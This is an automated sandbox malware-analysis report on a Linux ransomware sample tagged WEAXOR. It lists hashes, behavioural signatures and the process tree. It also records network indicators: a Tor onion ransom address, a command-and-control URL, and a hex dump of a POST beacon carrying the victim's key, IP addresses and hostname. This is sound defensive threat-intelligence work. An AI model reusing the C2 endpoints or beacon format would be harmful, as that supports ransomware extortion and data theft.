Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
Zc9eO57fgF.elf

Overview

General Information

Sample name:Zc9eO57fgF.elf
renamed because original name is a hash value
Original sample name:20e0e61d27762a524f6974fb9f4995062582db351d5576e62a214d6b5e5808e7.elf
Analysis ID:1548498
MD5:503c35c37d00d04ff2793c2b4bf5038f
SHA1:a03a9d06ca8441cb2ec7fe0c49cb56023130d884
SHA256:20e0e61d27762a524f6974fb9f4995062582db351d5576e62a214d6b5e5808e7
Tags:elfRansomwareWEAXORuser-JAMESWT_MHT
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false

Signatures

Found Tor onion address
Reads system files that contain records of logged in users
Sample reads /proc/mounts (often used for finding a writable filesystem)
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Deletes log files
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "grep" command used to find patterns in files or piped streams
May check the online IP address of the machine
PID-file does not contain an ASCII number
Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
Reads system information from the proc file system
Reads the 'hosts' file potentially containing internal network hosts
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1548498
Start date and time:2024-11-04 15:17:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 20s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:Zc9eO57fgF.elf
renamed because original name is a hash value
Original Sample Name:20e0e61d27762a524f6974fb9f4995062582db351d5576e62a214d6b5e5808e7.elf
Detection:MAL
Classification:mal52.troj.evad.linELF@0/60@1/0

Warnings

  • Connection to analysis system has been lost, crash info: Unknown
  • VT rate limit hit for: Zc9eO57fgF.elf

Process Tree

  • system is lnxubuntu20
  • Zc9eO57fgF.elf (PID: 6236, Parent: 6157, MD5: 503c35c37d00d04ff2793c2b4bf5038f) Arguments: /tmp/Zc9eO57fgF.elf
  • systemd New Fork (PID: 6255, Parent: 1)
  • systemd-logind (PID: 6255, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 6321, Parent: 1)
  • accounts-daemon (PID: 6321, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 6331, Parent: 6321, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 6333, Parent: 6331, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 6337, Parent: 6333, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 6338, Parent: 6337)
          • locale (PID: 6338, Parent: 6337, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 6339, Parent: 6337)
          • grep (PID: 6339, Parent: 6337, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • systemd New Fork (PID: 6324, Parent: 1860)
  • pulseaudio (PID: 6324, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • Default (PID: 6328, Parent: 1809, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PostSession/Default
  • gdm3 New Fork (PID: 6342, Parent: 1320)
  • gdm-session-worker (PID: 6342, Parent: 1320, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
    • gdm-x-session (PID: 6372, Parent: 6342, MD5: 498a824333f1c1ec7767f4612d1887cc) Arguments: /usr/lib/gdm3/gdm-x-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
      • Xorg (PID: 6374, Parent: 6372, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/bin/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
      • Xorg.wrap (PID: 6374, Parent: 6372, MD5: 48993830888200ecf19dd7def0884dfd) Arguments: /usr/lib/xorg/Xorg.wrap vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
      • Xorg (PID: 6374, Parent: 6372, MD5: 730cf4c45a7ee8bea88abf165463b7f8) Arguments: /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
        • Xorg New Fork (PID: 6405, Parent: 6374)
        • sh (PID: 6405, Parent: 6374, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
          • sh New Fork (PID: 6406, Parent: 6405)
          • xkbcomp (PID: 6406, Parent: 6405, MD5: c5f953aec4c00d2a1cc27acb75d62c9b) Arguments: /usr/bin/xkbcomp -w 1 -R/usr/share/X11/xkb -xkm - -em1 "The XKEYBOARD keymap compiler (xkbcomp) reports:" -emp "> " -eml "Errors from xkbcomp are not fatal to the X server" /tmp/server-0.xkm
      • dbus-daemon (PID: 6410, Parent: 6372, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --print-address 4 --session
        • dbus-daemon New Fork (PID: 6412, Parent: 6410)
          • false (PID: 6413, Parent: 6412, MD5: 3177546c74e4f0062909eae43d948bfc) Arguments: /bin/false
  • gdm3 New Fork (PID: 6344, Parent: 1320)
  • Default (PID: 6344, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6347, Parent: 1320)
  • Default (PID: 6347, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6365, Parent: 1320)
  • Default (PID: 6365, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6416, Parent: 1320)
  • Default (PID: 6416, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6417, Parent: 1320)
  • Default (PID: 6417, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • cleanup

Yara Signatures

No yara matches

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pulseaudio (PID: 6324)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/lib/xorg/Xorg (PID: 6374)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

Networking

barindex
Found Tor onion address
Source: Zc9eO57fgF.elfString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/{id}
Source: RECOVERY INFO.txt4.12.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4
Source: RECOVERY INFO.txt13.12.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4
Source: RECOVERY INFO.txt7.12.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4
Source: RECOVERY INFO.txt2.12.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4
Source: RECOVERY INFO.txt8.12.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4
Source: RECOVERY INFO.txt.12.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4
Source: RECOVERY INFO.txt10.12.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4
Source: RECOVERY INFO.txt11.12.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4
Source: RECOVERY INFO.txt0.12.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4
Source: RECOVERY INFO.txt5.12.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4
Source: RECOVERY INFO.txt1.12.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4
Source: RECOVERY INFO.txt3.12.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4
Source: RECOVERY INFO.txt9.12.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4
Source: RECOVERY INFO.txt6.12.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4
Source: RECOVERY INFO.txt12.12.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/lib/xorg/Xorg (PID: 6374)Socket: unknown address familyJump to behavior
Source: /usr/bin/dbus-daemon (PID: 6410)Socket: unknown address familyJump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: unknownHTTP traffic detected: POST /Ujdu8jjooue/biweax.php HTTP/1.1Host: 193.143.1.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Content-Length: 1977Accept: */*Content-Type: multipart/form-data; boundary=------------------------3yO5v8qEWData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 79 4f 35 76 38 71 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 76 65 72 73 69 6f 6e 22 0d 0a 0d 0a 31 2e 30 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 79 4f 35 76 38 71 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 74 74 70 73 5f 70 72 6f 74 6f 63 6f 6c 22 0d 0a 0d 0a 4e 4f 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 79 4f 35 76 38 71 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 61 73 68 22 0d 0a 0d 0a 45 41 34 45 43 35 30 30 39 38 44 35 45 33 41 35 32 38 34 33 36 33 36 30 36 31 33 37 43 33 38 31 30 30 43 39 44 34 44 39 30 37 46 42 38 32 43 31 43 38 34 41 38 30 36 35 38 38 44 31 43 39 37 37 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 79 4f 35 76 38 71 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 65 79 5f 6f 66 5f 74 61 72 67 65 74 22 0d 0a 0d 0a 43 32 41 42 43 34 35 37 35 32 34 34 45 43 46 36 38 44 32 36 30 46 30 31 34 35 41 38 33 42 39 44 42 30 31 33 31 42 39 31 42 39 37 43 43 33 32 31 39 33 31 38 37 45 35 35 36 36 38 33 33 33 43 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 79 4f 35 76 38 71 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 65 78 74 65 72 6e 61 6c 5f 49 50 22 0d 0a 0d 0a 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 79 4f 35 76 38 71 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 69 6e 74 65 72 6e 61 6c 5f 49 50 22 0d 0a 0d 0a 31 32 37 2e 30 2e 30 2e 31 2c 31 39 32 2e 31 36 38 2e 32 2e 32 33 2c 3a 3a 31 2c 66 65 38 30 3a 3a 32 35 30 3a 35 36 66 66 3a 66 65 39 38 3a 39 31 32 63 25 65 6e 73 31 36 30 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 79 4f 35 76 38 71 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 6f 73 74 6e 61 6d 65 22 0d 0a 0d 0a 67 61 6c 61 73 73 69 61 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 79 4f 35 76 38 71 45 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 7
Source: Zc9eO57fgF.elfString found in binary or memory: http://193.143.1.139/Ujdu8jjooue/biweax.php
Source: Zc9eO57fgF.elfString found in binary or memory: http://193.143.1.139/Ujdu8jjooue/biweax.phpYour
Source: Zc9eO57fgF.elfString found in binary or memory: http://193.143.1.139/Ujdu8jjoouehttp://api.ipify
Source: Zc9eO57fgF.elf, RECOVERY INFO.txt4.12.dr, RECOVERY INFO.txt13.12.dr, RECOVERY INFO.txt7.12.dr, RECOVERY INFO.txt2.12.dr, RECOVERY INFO.txt8.12.dr, RECOVERY INFO.txt.12.dr, RECOVERY INFO.txt10.12.dr, RECOVERY INFO.txt11.12.dr, RECOVERY INFO.txt0.12.dr, RECOVERY INFO.txt5.12.dr, RECOVERY INFO.txt1.12.dr, RECOVERY INFO.txt3.12.dr, RECOVERY INFO.txt9.12.dr, RECOVERY INFO.txt6.12.dr, RECOVERY INFO.txt12.12.drString found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzO
Source: Xorg.0.log.47.drString found in binary or memory: http://wiki.x.org
Source: Xorg.0.log.47.drString found in binary or memory: http://www.ubuntu.com/support)
Source: Zc9eO57fgF.elfString found in binary or memory: https://gcc.gnu.org/bugsNSt7__cxx1115basic_stringbufIcSt11char_traitsIcESaIcEEE
Source: Zc9eO57fgF.elfString found in binary or memory: https://gcc.gnu.org/bugsNSt7__cxx1115basic_stringbufIcSt11char_traitsIcESaIcEEENSt7__cxx1119basic_is
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal52.troj.evad.linELF@0/60@1/0
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)/run/gdm3.pid: ...-{Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)/run/mono-xsp4.pid: .n".Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)/run/sshd.pid: ....Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)/run/crond.pid: .p..Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)/run/acpid.pid: .57.Jump to behavior

Persistence and Installation Behavior

barindex
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File: /proc/6236/mountsJump to behavior
Source: /usr/bin/dbus-daemon (PID: 6410)File: /proc/6410/mountsJump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File: /tmp/.89A72EF01Jump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)Directory: <invalid fd (24)>/..Jump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)Directory: <invalid fd (23)>/..Jump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)File: /run/systemd/seats/.#seat04agMacJump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)File: /run/systemd/inhibit/.#336tpsaJump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)File: /run/systemd/inhibit/.#5fKbbzbJump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)File: /run/systemd/inhibit/.#6PPli7cJump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)File: /run/systemd/inhibit/.#1yYk6laJump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)File: /run/systemd/inhibit/.#7Kdz37cJump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)File: /run/systemd/inhibit/.#4EmLAPaJump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)File: /run/systemd/inhibit/.#104NhbtcJump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)File: /run/systemd/inhibit/.#8tNOlXcJump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)File: /run/systemd/inhibit/.#1etcjRbJump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)File: /run/systemd/users/.#127LWpP9aJump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)File: /run/systemd/users/.#12768ksT9Jump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)File: /run/systemd/seats/.#seat0EmuCMcJump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)File: /run/systemd/users/.#127HzAnO8Jump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)File: /run/systemd/users/.#127jPkZqbJump to behavior
Source: /lib/systemd/systemd-logind (PID: 6255)File: /run/systemd/users/.#127RdFnQbJump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 6321)Directory: /var/lib/gdm3/.pam_environmentJump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 6321)Directory: /root/.cacheJump to behavior
Source: /usr/lib/gdm3/gdm-x-session (PID: 6372)Directory: /var/lib/gdm3/.cacheJump to behavior
Source: /usr/lib/xorg/Xorg (PID: 6374)Directory: <invalid fd (23)>/..Jump to behavior
Source: /usr/lib/xorg/Xorg (PID: 6374)Directory: <invalid fd (22)>/..Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)Empty hidden file: /tmp/.89A72EF01Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/3088/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/3088/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/3088/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/3088/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/230/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/230/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/230/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/230/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/110/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/110/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/110/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/231/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/231/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/231/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/231/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/111/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/111/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/111/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/232/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/232/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/232/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/232/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/112/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/112/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/112/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/112/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/233/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/233/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/233/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/233/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/1699/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/1699/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/1699/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/1699/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/113/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/113/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/113/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/113/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/234/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/234/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/234/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/234/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/1335/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/1335/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/1335/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/114/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/114/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/114/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/114/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/235/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/235/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/235/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/235/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/1334/fd/Jump to behavior
Source: /tmp/Zc9eO57fgF.elf (PID: 6236)File opened: /proc/1334/fd/Jump to behavior
